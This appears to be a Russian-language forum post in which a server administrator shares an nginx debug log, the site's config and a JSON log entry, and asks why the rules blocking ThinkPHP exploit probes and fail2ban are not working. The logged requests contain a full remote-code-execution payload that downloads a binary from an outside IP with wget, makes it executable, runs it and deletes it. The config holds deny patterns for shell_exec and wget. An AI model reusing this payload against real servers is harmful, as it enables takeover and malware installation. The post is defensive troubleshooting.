2021/01/13 11:44:27 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
2021/01/13 11:44:27 [debug] 589#589: posix_memalign: 00584A50:256 @16
2021/01/13 11:44:27 [debug] 589#589: *13 accept: 5.89.124.222:48290 fd:9
2021/01/13 11:44:27 [debug] 589#589: *13 event timer add: 9: 60000:4213358598
2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 1
2021/01/13 11:44:27 [debug] 589#589: *13 epoll add event: fd:9 op:1 ev:80002001
2021/01/13 11:44:27 [debug] 589#589: *13 post event 005BF8C0
2021/01/13 11:44:27 [debug] 589#589: *13 delete posted event 005BF8C0
2021/01/13 11:44:27 [debug] 589#589: *13 http wait request handler
2021/01/13 11:44:27 [debug] 589#589: *13 malloc: 0059A928:1024
2021/01/13 11:44:27 [debug] 589#589: *13 posix_memalign: 0059AD30:256 @16
2021/01/13 11:44:27 [debug] 589#589: *13 recv: fd:9 0 of 1024
2021/01/13 11:44:27 [info] 589#589: *13 client closed connection while waiting for request, client: 5.89.124.222, server: 0.0.0.0:80
2021/01/13 11:44:27 [debug] 589#589: *13 close http connection: 9
2021/01/13 11:44:27 [debug] 589#589: *13 event timer del: 9: 4213358598
2021/01/13 11:44:27 [debug] 589#589: *13 reusable connection: 0
2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059A928
2021/01/13 11:44:27 [debug] 589#589: *13 free: 00584A50, unused: 8
2021/01/13 11:44:27 [debug] 589#589: *13 free: 0059AD30, unused: 232
2021/01/13 11:56:00 [debug] 589#589: post event 005BF860
2021/01/13 11:56:00 [debug] 589#589: delete posted event 005BF860
2021/01/13 11:56:00 [debug] 589#589: accept on 0.0.0.0:80, ready: 0
2021/01/13 11:56:00 [debug] 589#589: posix_memalign: 00584A50:256 @16
2021/01/13 11:56:00 [debug] 589#589: *14 accept: 86.34.111.230:33013 fd:9
2021/01/13 11:56:00 [debug] 589#589: *14 event timer add: 9: 60000:4214051446
2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 1
2021/01/13 11:56:00 [debug] 589#589: *14 epoll add event: fd:9 op:1 ev:80002001
2021/01/13 11:56:00 [debug] 589#589: *14 post event 005BF8C0
2021/01/13 11:56:00 [debug] 589#589: *14 delete posted event 005BF8C0
2021/01/13 11:56:00 [debug] 589#589: *14 http wait request handler
2021/01/13 11:56:00 [debug] 589#589: *14 malloc: 0059A928:1024
2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0059AD30:256 @16
2021/01/13 11:56:00 [debug] 589#589: *14 recv: fd:9 320 of 1024
2021/01/13 11:56:00 [debug] 589#589: *14 reusable connection: 0
2021/01/13 11:56:00 [debug] 589#589: *14 posix_memalign: 0058AD60:4096 @16
2021/01/13 11:56:00 [debug] 589#589: *14 http process request line
2021/01/13 11:56:00 [debug] 589#589: *14 http request line: "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
2021/01/13 11:56:00 [debug] 589#589: *14 http uri: "/index.php"
2021/01/13 11:56:00 [debug] 589#589: *14 http args: "s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
2021/01/13 11:56:00 [debug] 589#589: *14 http exten: "php"
2021/01/13 11:56:00 [debug] 589#589: *14 http process request header line
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Connection: keep-alive"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept-Encoding: gzip, deflate"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "Accept: /"
2021/01/13 11:56:00 [debug] 589#589: *14 http header: "User-Agent: Uirusu/2.0"
2021/01/13 11:56:00 [debug] 589#589: *14 http header done
2021/01/13 11:56:00 [info] 589#589: *14 client sent HTTP/1.1 request without "Host" header while reading client request headers, client: 86.34.111.230, server: vitko-core.ru, request: "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"
2021/01/13 11:56:00 [debug] 589#589: *14 http finalize request: 400, "/index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'" a:1, c:1
2021/01/13 11:56:00 [debug] 589#589: *14 event timer del: 9: 4214051446
2021/01/13 11:56:00 [debug] 589#589: *14 http special response: 400, "/index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"
2021/01/13 11:56:00 [debug] 589#589: *14 http set discard body
2021/01/13 11:56:00 [debug] 589#589: *14 xslt filter header
2021/01/13 11:56:00 [debug] 589#589: *14 HTTP/1.1 400 Bad Request
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 13 Jan 2021 09:56:00 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
http://vitko-core.ru/dev/log/
. Вчера проверял через curl вроде всё работало, очистил лог - смотрю уже сейчас уже нет root@ZeroPi-WWW:/tmp# cat /etc/nginx/sites-enabled/vitko-core.ru
# http://vitko-core.ru
server {
listen 80 default_server;
root /var/www/vitko-core.ru;
index index.php index.html index.htm;
server_name vitko-core.ru www.vitko-core.ru;
#if ($request_uri ~* "call_user_func_array|shell_exec|wget") { return 444;break;}
location / {
if ($query_string ~ "call_user_func_array" ) {
return 403;
}
try_files $uri $uri/ =404;
}
location ~ \.php$ {
if ( $args ~* "call_user_func_array|shell_exec|wget" ) {
return 444;
}
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.0-fpm.sock;
}
}
{"status": "400","ip": "189.111.65.123","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://88.218.16.198/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "Uirusu/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T23:08:40+02:00"}
Почему у меня не работает конфиг?
Конфиг работает, проверял в [asterisk] добавлял [asterisk1] что бы проверить fail2ban-client status asterisk1 и он работал, вернул обратно, в основном конфиге смотрел [asterisk] и там нету enable, ну и я название менял - а fail2ban не работает